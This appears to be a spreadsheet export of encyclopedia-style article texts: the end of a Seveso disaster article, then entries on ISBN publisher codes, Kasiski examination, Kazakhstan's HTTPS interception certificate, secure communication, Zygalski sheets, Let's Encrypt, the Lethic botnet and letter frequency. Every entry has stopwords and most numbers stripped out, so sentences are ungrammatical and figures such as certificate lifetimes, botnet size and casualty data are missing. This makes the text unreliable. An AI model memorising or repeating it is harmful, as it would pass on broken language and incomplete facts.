diseases uncovered, excess diabetes cases also found. results cancer incidence mortality follow-up showed increased occurrence cancer gastrointestinal sites lymphatic hematopoietic tissue. results cannot viewed final comprehensive, however, various limitations: lack individual exposure data, short latency period, small population size certain cancer types. 2001 study confirmed victims disaster, dioxin carcinogenic humans corroborate association cardiovascular- endocrine-related effects. 2009, update including years 1996) found increase "lymphatic hematopoietic tissue neoplasms" increased breast cancer.a 2008 study evaluated whether maternal exposure associated modified neonatal thyroid function highly exposed population seveso concluded environmental contaminants dioxins long-lasting capability modify neonatal thyroid function initial exposure. male children mothers were, pregnancy children, exposed high levels toxic dioxins seveso disaster, found lower-than-average sperm counts. this result underlying seveso study noted provide pronounced evidence prenatal exposure environmental chemical causing sperm counts. cleanup operations january 1977, action plan consisting scientific analysis, economic aid, medical monitoring restoration/decontamination completed. shortly icmesa began first compensations affected. later spring decontamination operations initiated june system epidemiological health monitoring 220,000 people launched. they used trichlorophenol make drug fight skin infections, tested dogs. june 1978, italian government raised special loan billion lire. year, individual compensation claims settled court. february 1980, paolo paoletti director production icmesa shot killed monza member italian radical left-wing terrorist organization prima linea.on december 1980, representatives region lombardy/italian republic givaudan/icmesa signed compensation agreement presence prime minister italy, arnaldo forlani. total amount would reach billion lire. waste cleanup waste clean plant mixture protective clothing chemical residues plant. this waste packed waste drums designed storage nuclear waste. agreed waste would disposed legal manner. end, spring 1982, firm mannesmann italiana contracted dispose contaminated chemicals zone mannesmann italiana made condition givaudan would notified disposal site prompted givaudan insist notary public certify disposal. september barrels toxic waste left icmesa premises. december notary gave sworn statement barrels disposed approved way. however, february 1983, programme entendeur télévision suisse romande, french language swiss television channel, followed route barrels saint-quentin northern france disappeared. public debate ensued numerous theories forward found mannesmann italiana hired subcontractors toxic waste. barrels found unused abattoir (slaughterhouse) anguilcourt-le-sart, village northern france. from transferred french military base near sissonne. roche group (parent firm givaudan) took upon properly dispose waste. november nine years disaster, roche group issued public statement toxic waste consisting barrels (one added earlier year) incinerated switzerland. according scientist, thought high chlorine content waste might cause damage high temperature incinerator used roche, roche stated would burn waste incinerator repair afterward damaged. they stated wanted take responsibility safe destruction waste. criminal court case september 1983, criminal court monza sentenced five former employees icmesa parent company, givaudan, prison sentences ranging years years. they appealed. 1985, court appeal milan found three five accused guilty; still facing prosecution appealed supreme court rome. 1986, supreme court rome confirmed judgment remaining defendants, even though prosecuting attorney called acquittal. aftermath after incident, icmesa initially refused admit dioxin release occurred. least week passed public statement issued dioxin emitted, another week passed evacuation began. even then, government saddled responsibility determining boundaries evacuation area, thereafter organise evacuation. this constituted major imposition community well government resources. soon recognized factory's rudimentary safety systems designed little simple explosion prevention mind. environmental protection considered. consideration given setting type warning system health-protection protocols local community. result, local population caught unaware accident happened, thus unprepared cope danger invisible poison. context heightened tensions, seveso became microcosm existing conflicts within society (political, institutional, religious, industrial) reflected. however, within relatively short time, conflicts abated recovery community proceeded. for, seveso, responsible party known outset soon offered reparation. moreover, eventual disappearance offending factory physical exportation toxic substances polluted soil enabled community feel cleansed. resolution emotional after-effects trauma, necessary recovery community, facilitated favourable circumstances." industrial safety regulations passed european community 1982 called seveso directive, imposed much stronger industrial regulations. seveso directive updated 1996, 2008 2012 currently referred seveso directive comah regulations united kingdom). treatment soil affected areas considered complete, since dioxin levels background. entire site turned public park known seveso forest park. this area permanently off-limits development. there artificial hills park; today, underneath hills toxic remnants (including destroyed houses, tons contaminated soil, animal remains), protected concrete sarcophagus. investigations site conditions confirmed sarcophagus life expectancy years expected, appropriate, required.several studies completed health population surrounding communities. while established people seveso exposed tcdd susceptible certain rare cancers, types cancers grouped category, statistically significant increase reported specific cancer category. this indicates research needed determine true long-term health effects affected population. epidemiological monitoring programmes established follows (with termination dates): abortions (1982); malformations (1982); tumours (1997); deaths (1997). health monitoring workers icmesa decontamination projects, chloracne sufferers (1985)the documentary gambit jörg sambeth, technical director icmesa, sentenced five years first trial, sentence reduced years paroled appeal. also environmental inequality europe inochi chikyuu: dioxin natsu 2001 film incident) "suffocation," fifth track dystopian concept album, later, vangelis, inspired seveso disaster features emergency announcement italian take shelter dialog woman unfolding disaster. "seveso directive", three european union directives improve safety sites containing large quantities dangerous substances: directive 82/501/ec, also known "seveso directive" directive 96/82/ec, also known "seveso directive" directive 2012/18/eu, also known "seveso directive" references further reading fuller, john (1979). poison that fell sky. york: berkley books. isbn 0-425-04013-5. robbe, federico (2016). seveso 1976. oltre diossina. castel bolognese: itaca books. isbn 978-88-526-0486-7. external links loss prevention bulletin seveso disaster: appraisal causes circumstances, marshallvagri, v.c., issue 104, april 1992, icheme, national pollutant inventory dioxin fact sheet dioxin: seveso disaster testament effects dioxin, article mick corliss, 1999. icmesa chemical company, seveso, italy. july 1976 british health safety executive comah information page seveso disaster. assessment health risks dioxins, 1998 report world health organization. roche 1965 1978 history timeline homepage hoffmann-laroche.</t>
  </si>
  <si>
    <t>List of group-0 ISBN publisher codes</t>
  </si>
  <si>
    <t>list publisher codes (978) international standard book numbers group code zero. assignation group-0 publisher codes assigned follows: 2-digit publisher codes 3-digit publisher codes (note: status codes listed table unclear; please help fill gaps.) 4-digit publisher codes (note: many codes listed table; please help fill gaps.) 5-digit publisher codes (note: many codes listed table; please help fill gaps.) 6-digit publisher codes (note: many codes listed table; please help fill gaps.) 7-digit publisher codes (note: many codes listed table; please help fill gaps.) also list group-1 isbn publisher codes list isbn identifier groups references external links https://www.isbn-international.org/range_file_generation http://www.books-by-isbn.com/ list 3-digit publisher codes isbns start http://blog.openlibrary.org/2009/07/20/isbn-publisher-codes/ also complete list publisher codes isbns start</t>
  </si>
  <si>
    <t>Kasiski examination</t>
  </si>
  <si>
    <t>cryptanalysis, kasiski examination (also referred kasiski's test kasiski's method) method attacking polyalphabetic substitution ciphers, vigenère cipher. first published friedrich kasiski 1863, seems independently discovered charles babbage early 1846. works polyalphabetic substitution ciphers substitution alphabets chosen keyword, kasiski examination allows cryptanalyst deduce length keyword. once length keyword discovered, cryptanalyst lines ciphertext columns, length keyword. then column treated ciphertext monoalphabetic substitution cipher. such, column attacked frequency analysis. similarly, rotor stream cipher machine used, method allow deduction length individual rotors. kasiski examination involves looking strings characters repeated ciphertext. strings three characters long examination successful. then, distances consecutive occurrences strings likely multiples length keyword. thus finding repeated strings narrows possible lengths keyword, since take greatest common divisor distances. reason test works repeated string occurs plaintext, distance corresponding characters multiple keyword length, keyword letters line occurrences string. example, consider plaintext: crypto short cryptography. "crypto" repeated string, distance occurrences characters. line plaintext 6-character keyword "abcdef" divide 20): abcdefabcdefabcdefabcdefabcdefabc crypto short cryptography. first instance "crypto" lines "abcdef" second instance lines "cdefab". instances encrypt different ciphertexts kasiski examination reveal nothing. however, 5-character keyword "abcde" divides 20): abcdeabcdeabcdeabcdeabcdeabcdeabc crypto short cryptography. occurrences "crypto" line "abcdea". instances encrypt ciphertext kasiski examination effective. string-based attack difficulty using kasiski examination lies finding repeated strings. this hard task perform manually, computers make much easier. however, care still required, since repeated strings coincidence, repeat distances misleading. cryptanalyst rule coincidences find correct length. then, course, monoalphabetic ciphertexts result must cryptanalyzed. cryptanalyst looks repeated groups letters counts number letters beginning repeated group. instance, ciphertext fgxthjaqwnfgxq, distance groups analyst records distances repeated groups text. analyst next factors numbers. number repeated majority factorings, likely length keyword. this repeated groups likely occur letters encrypted using letters mere coincidence; especially true long matching strings. letters repeated multiples length, distances found step likely multiples length. common factor usually evident. once keyword length known, following observation babbage kasiski comes play. keyword letters long, every letter must enciphered using letter keytext. grouping every letter together, analyst "messages", encrypted using one-alphabet substitution, piece attacked using frequency analysis. using solved message, analyst quickly determine keyword was. process solving pieces, analyst might guesses keyword assist breaking message. once interceptor knows keyword, knowledge used read messages key. superimposition kasiski actually used "superimposition" solve vigenère cipher. started finding length, above. then took multiple copies message laid one-above-another, shifted left length key. kasiski observed column made letters encrypted single alphabet. method equivalent described above, perhaps easier picture. modern attacks polyalphabetic ciphers essentially identical described above, improvement coincidence counting. instead looking repeating groups, modern analyst would take copies message another. modern analysts computers, description illustrates principle computer algorithms implement. generalized method: analyst shifts bottom message letter left, letters left, etc., time going entire message counting number times letter appears bottom message. number "coincidences" goes sharply bottom message shifted multiple length, adjacent letters language using alphabet. having found length, cryptanalysis proceeds described using frequency analysis. references</t>
  </si>
  <si>
    <t>Kazakhstan man-in-the-middle attack</t>
  </si>
  <si>
    <t>2015, government kazakhstan created root certificate could enabled man-in-the-middle attack https traffic internet users kazakhstan. government described "national security certificate". installed users' devices, certificate would allowed kazakh government intercept, decrypt, re-encrypt traffic passing systems controlled.in july 2019, kazakh isps started messaging users certificate, called qaznet trust certificate, issued state certificate authority qaznet trust network, would installed users.sites operated google, facebook twitter appear among kazakh government's initial targets.on august 2019, mozilla google simultaneously announced firefox chrome browsers would accept government-issued certificate, even installed manually users. apple also announced would make similar changes safari browser. august 2019, microsoft made changes browsers, reiterated government-issued certificate trusted root store browsers, would effect unless user manually installed it.in december 2020, kazakh government attempted re-introduce government-issued root certificate third time. response this, browser vendors announced would block attempt invalidating certificate browsers. references</t>
  </si>
  <si>
    <t>Secure communication</t>
  </si>
  <si>
    <t>secure communication entities communicating want third party listen case, entities need communicate unsusceptible eavesdropping interception. secure communication includes means people share information varying degrees certainty third parties cannot intercept said. other spoken face-to-face communication possible eavesdropper, probably safe communication guaranteed secure sense, although practical obstacles legislation, resources, technical issues (interception encryption), sheer volume communication serve limit surveillance. with many communications taking place long distance mediated technology, increasing awareness importance interception issues, technology compromise heart debate. reason, article focuses communications mediated intercepted technology. also trusted computing, approach present development achieves security general potential cost compelling obligatory trust corporate government bodies. history 1898, nikola tesla demonstrated radio controlled boat madison square garden allowed secure communication transmitter receiver.one famous systems secure communication green hornet. during wwii, winston churchill discuss vital matters franklin roosevelt. beginning, calls made using voice scrambler, thought secure. when found untrue, engineers started work whole system, resulted green hornet sigsaly. with green hornet, unauthorized party listening would hear white noise, conversation would remain clear authorized parties. secrecy paramount, location green hornet known people built winston churchill. maintain secrecy, green hornet kept closet labeled 'broom cupboard.'' green hornet used one-time pad. sigsaly also never broken. nature limits security types security security broadly categorized following headings, examples: hiding content nature communication code rule convert piece information (for example, letter, word, phrase, gesture) another form representation (one sign another sign), necessarily type. communications information processing, encoding process information source converted symbols communicated. decoding reverse process, converting code symbols back information understandable receiver. reason coding enable communication places ordinary spoken written language difficult impossible. example, semaphore, configuration flags held signaler arms semaphore tower encodes parts message, typically individual letters numbers. another person standing great distance away interpret flags reproduce words sent. obfuscation encryption steganography identity based hiding parties communication preventing identification, promoting anonymity "crowds" similar anonymous group structures difficult identify said comes "crowd" anonymous communication devices unregistered cellphones, internet cafes anonymous proxies hard-to-trace routing methods unauthorized third-party systems, relays hiding fact communication takes place "security obscurity" similar needle haystack random traffic creating random data flow make presence genuine communication harder detect traffic analysis less reliableeach three types security important, depending circumstances, critical. example, communication readily identifiable, unlikely attract attention identification parties, mere fact communication taken place (regardless content) often enough establish evidential link legal prosecutions. also important computers, sure security applied, covered. borderline cases category, touches upon secure communication, software intended take advantage security openings end-points. this software category includes trojan horses, keyloggers spyware. these types activity usually addressed everyday mainstream security methods, antivirus software, firewalls, programs identify neutralize adware spyware, filtering programs proxomitron privoxy check pages read identify remove common nuisances contained. rule fall computer security rather secure communications. tools used obtain security encryption encryption method data rendered hard read unauthorized party. since encryption methods created extremely hard break, many communication methods either deliberately weaker encryption possible, backdoors inserted permit rapid decryption. cases government authorities required backdoors installed secret. many methods encryption also subject "man middle" attack whereby third party 'see' establishment secure communication made privy encryption method, would apply example interception computer isp. provided correctly programmed, sufficiently powerful, keys intercepted, encryption would usually considered secure. article size examines requirements certain degrees encryption security. encryption implemented requires encryption, i.e. encrypted communication impossible traffic sent, opportunistically. opportunistic encryption lower security method generally increase percentage generic traffic encrypted. this analogous beginning every conversation speak navajo?" response affirmative, conversation proceeds navajo, otherwise uses common language speakers. this method generally provide authentication anonymity protect content conversation eavesdropping. information-theoretic security technique known physical layer encryption ensures wireless communication link provably secure communications coding techniques. steganography steganography ("hidden writing") means data hidden within innocuous data. thus watermark proving ownership embedded data picture, hard find remove unless know find communication, hiding important data (such telephone number) apparently innocuous data music file). advantage steganography plausible deniability, unless prove data (which usually easy), deniable file contains any. identity based networks unwanted malicious behavior possible since internet inherently anonymous. true identity based networks replace ability remain anonymous inherently trustworthy since identity sender recipient known. (the telephone system example identity based network.) anonymized networks recently, anonymous networking used secure communications. principle, large number users running system, communications routed hard detect complete message user sent ultimately coming going examples crowds, tor, i2p, mixminion, various anonymous networks, others. anonymous communication devices theory, unknown device would noticed, since many devices use. this altogether case reality, presence systems carnivore echelon, monitor communications entire networks, fact monitored before. examples include payphones, internet cafe, etc. methods used "break" security bugging placing covertly monitoring and/or transmission devices either within communication device, premises concerned. computers (general) security obtained computer limited many ways compromised hacking, keystroke logging, backdoors, even extreme cases monitoring tiny electrical signals given keyboard monitors reconstruct typed seen (tempest, quite complex). laser audio surveillance sounds, including speech, inside rooms sensed bouncing laser beam window room conversation held, detecting decoding vibrations glass caused sound waves. systems offering partial security cellphones cellphones easily obtained, also easily traced "tapped". there limited) encryption, phones traceable often even switched since phone card broadcast international mobile subscriber identity (imsi). possible cellphone company turn cellphones user unaware microphone listen you, according james atkinson, counter-surveillance specialist cited source, "security-conscious corporate executives routinely remove batteries cell phones" since many phones' software used "as-is", modified, enable transmission without user awareness user located within small distance using signal triangulation using built features newer models. transceivers also defeated jamming faraday cage. some cellphones (apple's iphone, google's android) track store users' position information, movements months years determined examining phone.us government also access cellphone surveillance technologies, mostly applied enforcement. landlines analogue landlines encrypted, lends easily tapped. such tapping requires physical access line easily obtained number places, e.g. phone location, distribution points, cabinets exchange itself. tapping landline enable attacker make calls appear originate tapped line. anonymous internet using third party system kind (payphone, internet cafe) often quite secure, however system used access known locations known email account party) tapped end, noted, remove security benefit obtained. some countries also impose mandatory registration internet cafe users. anonymous proxies another common type protection, allow access third party (often different country) make tracing difficult. note seldom guarantee plaintext tappable, proxy keep records users entire dialogs. result, anonymous proxies generally useful tool secure systems whose security better assured. their common prevent record originating address, left target site's records. typical anonymous proxies found regular websites anonymizer.com spynot.com, proxy sites maintain date lists large numbers temporary proxies operation. recent development theme arises wireless internet connections ("wi-fi") left unsecured state. effect person range base unit piggyback connection without owner aware. since many connections left open manner, situations piggybacking might arise (willful unaware) successfully defense cases, since makes difficult prove owner connection downloader, knowledge unknown others might putting connection. example tammie marson case, neighbours anyone else might culprit sharing copyright files. conversely, cases, people deliberately seek businesses households unsecured connections, illicit anonymous internet usage, simply obtain free bandwidth. programs offering security secure instant messaging some instant messaging clients end-to-end encryption forward secrecy secure instant messages users software. some instant messaging clients also offer end-to-end encrypted file transfer support group messaging. voip some voip clients implement zrtp srtp encryption calls. secure email email networks designed provide encrypted and/or anonymous communication. they authenticate encrypt users computer, prevent transmission plain text, mask sender recipient. mixminion i2p-bote provide higher level anonymity using network anonymizing intermediaries, similar works, higher latency. chat some clients systems client-to-server encryption ssl/tls. this standardized. government attacks encrypted communications encrochat shut down. global taken enforcement. phantom secure taken enforcement. recommendation future developments distributed computing avoid attacks servers. open source software. bugs corrected software improved. avoid complex operating systems micro-kernels. start scratch. open source hardware including open source cpu. bugs corrected hardware improved. avoid exploitable complex technologies secure side. example: dma, usb, wi-fi, bluetooth, jtag, cellular networks, ethernet etc... complex technologies absolutely needed, must separate system started compromised time. bridge secure insecure areas basic technologies implement caution. example rs-232, rs-485, i²c, custom bridges, etc... heavy shielding secure processing area. spread spectrum technology clocking switching power supplies. include true random number generator system. include amount random processing random communication random peers random amount data improve security side channel attacks, timing attacks, traffic analysis network mapping. aware supply chain attacks. also general background computer security opportunistic encryption communications security secure messaging software selections comparisons comparison voip software comparison instant messaging clients anonymous other freenet hepting at&amp;t, 2006 lawsuit electronic frontier foundation alleges at&amp;t inc. allowed clients' internet voice communications warrantless surveillance controversy secret cell phone references external links media related secure communication wikimedia commons</t>
  </si>
  <si>
    <t>Zygalski sheets</t>
  </si>
  <si>
    <t>method zygalski sheets cryptologic technique used polish cipher bureau world also british cryptologists bletchley park, decrypt messages enciphered german enigma machines. zygalski-sheet apparatus takes name polish cipher bureau mathematician–cryptologist henryk zygalski, invented october 1938. method zygalski's device comprised perforated sheets the, initially, possible sequences inserting three rotors enigma machine's scrambler. each sheet related starting position left (slowest-moving) rotor. matrix represented possible starting positions middle right rotors duplicated horizontally vertically: a–z, a–y. sheets punched holes positions would allow "female" occur. polish mathematician–cryptologist marian rejewski writes perforated-sheets device operated: when sheets superposed moved proper sequence proper manner respect other, accordance strictly defined program, number visible apertures gradually decreased. and, sufficient quantity data available, finally remained single aperture, probably corresponding right case, solution. from position aperture could calculate order rotors, setting rings, and, comparing letters cipher keys letters machine, likewise permutation words, entire cipher key. like rejewski's "card-catalog" method, developed using "cyclometer," zygalski-sheet procedure independent number plugboard plug connections enigma machine. manufacture cipher bureau's manual manufacture sheets, security reasons done mathematician-cryptologists themselves, using razor blades, time-consuming. december 1938 third finished. date, germans introduced rotors thus increasing labor making sheets tenfold, since times many sheets needed (for possible combinations sequences, enigma machine, rotors selected among 5).on july 1939, five weeks outbreak world polish general staff's cipher bureau disclosed french british allies, warsaw, cryptologic achievements breaking enigma ciphers. part disclosures involved zygalski's "perforated-sheet" method. british, bletchley park, near london, england, undertook production complete sets perforated sheets. work done, perforators, section headed john r.f. jeffreys. sheets known bletchley netz (from netzverfahren, "net method"), though later remembered gordon welchman "jeffreys sheets"; latter term, however, referred another catalog produced jeffreys' section.the first completed late december 1939. december part second delivered polish cryptologists, escaped german-overrun poland bruno outside paris, france. remaining sheets completed january 1940, couriered alan turing france shortly thereafter. "with help," writes rejewski, continued solving enigma daily keys." sheets used poles make first wartime decryption enigma message, january 1940.in 1940, germans completely changed procedure enciphering message keys (with exception norwegian network). result, zygalski's sheets use, though herivel could still used. also cryptanalysis enigma bomba ("cryptologic bomb"): machine designed october 1938 marian rejewski facilitate retrieval enigma keys bombe: machine, inspired rejewski's "cryptologic bomb," used british american cryptologists world grille (cryptography) punched card jacquard loom notes references herivel, john (2008), herivelismus german military enigma, cleobury mortimer, shropshire: baldwin, isbn 978-0947712464 kozaczuk, władysław (1984), enigma: german machine cipher broken, read allies world two, edited translated christopher kasparek ed.), frederick, maryland: university publications america, isbn 978-0890935477 revised augmented translation kręgu enigmy, warsaw, książka wiedza, 1979, supplemented appendices marian rejewski others. rejewski, marian (1982), "remarks appendix british intelligence second world f.h. hinsley," translated christopher kasparek", cryptologia (published january 1982), vol. 75–83, doi:10.1080/0161-118291856867 rejewski, marian (1984), summary methods reconstructing enigma reconstructing daily keys, german efforts frustrate those methods: appendix kozaczuk 1984, 241–245 rejewski, marian (1984), mathematical solution enigma cipher: appendix kozaczuk 1984, 272–291 external links javascript demonstration zygalski sheets "polish enigma double" about enigma (national security agency) "the enigma code breach" bury "enigma" intelligence "codebreaking secret weapons world bill momsen brief history computing technology, 1930 1939 casselman, bill, marian rejewski first break enigma, feature column, american mathematical society, retrieved 2014-11-15 casselman, bill, polish attack enigma zygalski sheets, feature column, american mathematical society, retrieved 2014-11-15 daily telegraph obituary mavis batey https://www.telegraph.co.uk/news/obituaries/military-obituaries/special-forces-obituaries/10447712/mavis-batey-obituary.html</t>
  </si>
  <si>
    <t>Let's Encrypt</t>
  </si>
  <si>
    <t>let's encrypt non-profit certificate authority internet security research group (isrg) provides x.509 certificates transport layer security (tls) encryption charge. world's largest certificate authority, used million websites, goal websites secure using https. internet security research group (isrg), provider service, public benefit organization. major sponsors include electronic frontier foundation (eff), mozilla foundation, ovh, cisco systems, facebook, google chrome, internet society, aws, nginx, bill melinda gates foundation. other partners include certificate authority identrust, university michigan (u-m), linux foundation. overview mission organization create secure privacy-respecting world-wide promoting widespread adoption https. let's encrypt certificates valid days, renewal take place time. this handled automated process designed overcome manual creation, validation, signing, installation, renewal certificates secure websites. project claims goal make encrypted connections world wide servers ubiquitous. eliminating payment, server configuration, validation email management certificate renewal tasks, meant significantly lower complexity setting maintaining encryption.on linux server, execution commands sufficient https encryption acquire install certificates. end, software package included official debian ubuntu software repositories. current initiatives major browser developers mozilla google deprecate unencrypted http counting availability let's encrypt. project acknowledged potential accomplish encrypted connections default case entire web.the service issues domain-validated certificates, since fully automated. organization validation extended validation certificates require human validation registrants, therefore offered let's encrypt. support acme wildcard certificates added march 2018. domain validation (dv) utilized let's encrypt dates back 2002 first controversial introduced geotrust becoming widely accepted method issuance certificates. transparent possible, organization hopes protect trustworthiness guard attacks manipulation attempts. purpose regularly publishes transparency reports, publicly logs acme transactions (e.g. using certificate transparency), uses open standards free software much possible. history let's encrypt project started 2012 mozilla employees, josh eric rescorla, together peter eckersley electronic frontier foundation alex halderman university michigan. internet security research group, company behind let's encrypt, incorporated 2013.let's encrypt announced publicly november 2014.on january 2015, acme protocol officially submitted ietf standardization. april 2015, isrg linux foundation declared collaboration. root intermediate certificates generated beginning june. june 2015, final launch schedule service announced, first certificate expected issued sometime week july 2015, followed limited issuance period test security scalability. general availability service originally planned begin sometime week september 2015. august 2015, launch schedule amended provide time ensuring system security stability, first certificate issued week september 2015 followed general availability week november 2015.on september 2015, let's encrypt issued first certificate, domain helloworld.letsencrypt.org. day, isrg submitted root program applications mozilla, microsoft, google apple.on october 2015, intermediate certificates became cross-signed identrust, causing certificates issued let's encrypt trusted major browsers.on november 2015, let's encrypt announced general availability would pushed back first public beta would commence december 2015. public beta december 2015 april 2016. launched april 2016.on march 2020, let's encrypt announced would revoke million certificates march flaw certificate authority software. through working software vendors contacting site operators, let's encrypt able million affected certificates renewed deadline. they ultimately decided revoke remaining affected certificates, security risk certificates expire within next days. mass-revocation event significantly increased global revocation rate.in march 2020, let's encrypt awarded free software foundation's annual award projects social benefit.on february 2020, let's encrypt announced issued billion certificates.as 2021, let's encrypt reports issued million active (unexpired) certificates. technology chain trust isrg root (rsa) june 2015, let's encrypt announced generation first root certificate, isrg root root certificate used sign intermediate certificates, also cross-signed certificate authority identrust. intermediate certificates used sign issued certificates, kept offline backup case problems first intermediate certificate. because identrust certificate already widely trusted major browsers, let's encrypt certificates normally validated accepted relying parties even browser vendors include isrg root certificate trust anchor. isrg root (ecdsa) let's encrypt developers planned generate ecdsa root back 2015, pushed back plan early 2016, 2019, finally 2020. september 2020, let’s encrypt issued certificates: ecdsa root named "isrg root x2", four intermediates, cross-sign. isrg root cross-signed isrg root let's encrypt's root certificate. let's encrypt issue ocsp responder intermediate certificates instead plans rely solely certificate revocation lists (crls) recall compromised certificates short validity periods reduce danger certificate compromise. acme protocol challenge–response protocol used automate enrolling certificate authority called automated certificate management environment (acme). query either servers servers controlled domain covered certificate issued. based whether resulting responses match expectations, control enrollee domain assured (domain validation). acme client software dedicated server gets queried acme certificate authority server requests using server name indication (domain validation using server name indication, dvsni), hooks publish responses existing servers. validation processes multiple times separate network paths. checking entries provisioned done multiple geographically diverse locations make spoofing attacks harder acme interactions based exchanging json documents https connections. draft specification available github, version submitted internet engineering task force (ietf) proposal internet standard.let's encrypt implemented draft acme protocol. time, pushed standardization. this "proposed standard" (rfc8555) 2019. introduced breaking changes dubbed acmev2. let's encrypt implemented version started pushing existing clients upgrades. nudging implemented intermittent down-times acmev1 api. end-of-lifetime announced dates phases "end life plan acmev1". since november 2019, acmev1 endpoint longer accepts account registrations. since june 2020, acmev1 stopped accepting domain validations. furthermore, since january 2021, acmev1 undergoes 24-hour brownouts. acmev1 scheduled turned completely june 2021. software implementation certificate authority consists piece software called boulder, written implements server side acme protocol. published free software source code terms version mozilla public license (mpl). provides restful accessed tls-encrypted channel. apache-licensed python certificate management program called certbot (formerly letsencrypt) gets installed client side (the server enrollee). this used order certificate, conduct domain validation process, install certificate, configure https encryption http server, later regularly renew certificate. after installation agreeing user license, executing single command enough valid certificate installed. additional options like ocsp stapling http strict transport security (hsts) also enabled. automatic setup initially works apache nginx. let's encrypt issues certificates valid days. reason given certificates "limit damage compromise mis-issuance" encourage automation.initially, let's encrypt developed acme client certbot official implementation. this transferred electronic frontier foundation name "letsencrypt" changed "certbot". there large selection acme clients projects number environments developed community. also https everywhere let's encrypt stats interactive charts let's encrypt certificates issued further reading barnes, hoffman-andrews, mccarney, kasten, (march 2019). automatic certificate management environment (acme) 8555. ietf. references external links official website certbot let's encrypt github seth schoen's libre planet 2015 lecture let's encrypt pde's talk let's encrypt cccamp 2015 list certificates issued let's encrypt</t>
  </si>
  <si>
    <t>Lethic botnet</t>
  </si>
  <si>
    <t>lethic botnet (initially discovered around 2008) botnet consisting estimated individual machines mainly involved pharmaceutical replica spam. dismantling revival around early january 2010 botnet dismantled neustar employees, contacted various lethic internet service providers take control botnet's command control servers. this move temporarily caused botnets' spam decrease trickle original volume.in february 2010 owners botnet managed re-establish control botnet, command control servers located united states. takedown decreased spam volume botnet, however. february 2010 botnets' amount spam third original. april 2010 botnet estimated 1.5% share spam market, sending billion spam messages day. also botnet malware internet crime internet security command control (malware) zombie (computer science) references external links technical analysis lethic botnet</t>
  </si>
  <si>
    <t>Letter frequency</t>
  </si>
  <si>
    <t>letter frequency number times letters alphabet appear average written language. letter frequency analysis dates back arab mathematician al-kindi 801–873 ad), formally developed method break ciphers. letter frequency analysis gained importance europe development movable type 1450 must estimate amount type required letterform. linguists letter frequency analysis rudimentary technique language identification, particularly effective indication whether unknown writing system alphabetic, syllabic, ideographic. letter frequencies frequency analysis plays fundamental role cryptograms several word puzzle games, including hangman, scrabble, wordle television game show wheel fortune. earliest descriptions classical literature applying knowledge english letter frequency solving cryptogram found edgar allan poe's famous story gold-bug, method successfully applied decipher message giving location treasure hidden captain kidd.herbert zim, classic introductory cryptography text "codes secret writing", gives english letter frequency sequence "etaon rishd lfcmu gypwb vkjxzq", common letter pairs to", common doubled letters cc". different ways counting produce somewhat different orders. letter frequencies also strong effect design keyboard layouts. frequent letters bottom blickensderfer typewriter, home dvorak keyboard layout. background frequency letters text studied cryptanalysis, frequency analysis particular, dating back arab mathematician al-kindi 801–873 ad), formally developed method (the ciphers breakable technique back least caesar cipher invented julius caesar, method could explored classical times). letter frequency analysis gained additional importance europe development movable type 1450 must estimate amount type required letterform, evidenced variations letter compartment size typographer's type cases. exact letter frequency distribution underlies given language, since writers write slightly differently. however, languages characteristic distribution strongly apparent longer texts. even language changes extreme english modern english (regarded mutually unintelligible) show strong trends related letter frequencies: small sample biblical passages, frequent least frequent, enaid sorhm tgþlwu æcfy ðbpxz english compares eotha sinrd luymw fgcbp kvjqxz modern english, extreme differences concerning letterforms shared.linotype machines english language assumed letter order, least common, etaoin shrdlu cmfwyp vbgkjq based experience custom manual compositors. equivalent french language elaoin sdrétu cmfhyp vbgwqj arranging alphabet morse groups letters require equal amounts time transmit, sorting groups increasing order, yields hurdm wgvlfbk opxcz jyq. letter frequency used telegraph systems, murray code. similar ideas used modern data-compression techniques huffman coding. letter frequencies, like word frequencies, tend vary, writer subject. cannot write essay x-rays without using frequent essay idiosyncratic letter frequency essay x-rays treat zebras qatar. different authors habits reflected letters. hemingway's writing style, example, visibly different faulkner's. letter, bigram, trigram, word frequencies, word length, sentence length calculated specific authors, used prove disprove authorship texts, even authors whose styles divergent. accurate average letter frequencies gleaned analyzing large amount representative text. with availability modern computing collections large text corpora, calculations easily made. examples drawn variety sources (press reporting, religious texts, scientific texts general fiction) differences especially general fiction position 'i', becoming common. also, note different dialects language also affect letter's frequency. example, author united states would produce something letter common author united kingdom writing topic: words like "analyze", "apologize", "recognize" contain letter american english, whereas words spelled "analyse", "apologise", "recognise" british english. this would highly affect frequency letter rarely used letter british speakers english language.the "top twelve" letters constitute total usage. "top eight" letters constitute total usage. letter frequency function rank fitted well several rank functions, two-parameter cocho/beta rank function best. another rank function adjustable free parameter also fits letter frequency distribution reasonably well (the function used amino acid frequency protein sequences.) using cipher cipher based straddling checkerboard typically uses mnemonic err" (dropping second "r") sir" remember eight characters. relative frequencies letters english language there three ways count letter frequency result different charts common letters. first method, used chart below, count letter frequency root words dictionary. second include word variants counting, "abstracts", "abstracted" "abstracting" root word "abstract". this system results letters like appearing much frequently, counting letters lists used english words internet. final variant count letters based frequency actual texts, resulting certain letter combinations like 'th' becoming common frequent common words like "the", "then", "both", "this", etc. absolute usage frequency measures like used creating keyboard layouts letter frequencies fashioned printing presses. analysis entries concise oxford dictionary, ignoring frequency word use, gives order "eariotnslcudpmhgbfywkvxzjq".the letter-frequency table taken pavel mička's website, cites robert lewand's cryptological mathematics.according lewand, arranged least common appearance, letters are: etaoinshrdlcumwfgypbvkjxqz. lewand's ordering differs slightly others, cornell university math explorer's project, produced table measuring 40,000 words.in english, space slightly frequent letter non-alphabetic characters (digits, punctuation, etc.) collectively occupy fourth position (having already included space) relative frequencies first letters word english language frequency first letters words names helpful pre-assigning space physical files indexes. given filing cabinet drawers, rather assignment drawer letter alphabet, often useful equal-frequency-letter code assigning several low-frequency letters drawer (often drawer labeled vwxyz), split most-frequent initial letters ('s', 'a', 'c') several drawers (often drawers aa-an, ao-az, ca-cj, ck-cz, sa-si, sj-sz). system used multi-volume works encyclopedias. cutter numbers, another mapping names equal-frequency code, used libraries. both overall letter distribution word-initial letter distribution approximately match zipf distribution even closely match yule distribution.often frequency distribution first digit datum significantly different overall frequency digits numeric data, benford's details. analysis peter norvig google books data determined, among things, frequency first letters english words.a june 2012 analysis using text document containing words english language exactly once, found common starting letter words english language, followed 'p', 'c', 'a'. relative frequencies letters languages *see dotless figure illustrates frequency distributions common latin letters across languages. languages similar character alphabet. based tables, 'etaoin shrdlu'-equivalent results language follows: french: 'esait nruol'; (indo-european: italic; traditionally, 'esartinulop' used, part ease pronunciation) spanish: 'eaosr nidlt'; (indo-european: italic) portuguese: 'aeosr idmnt' (indo-european: italic) italian: 'eaion lrtsc'; (indo-european: 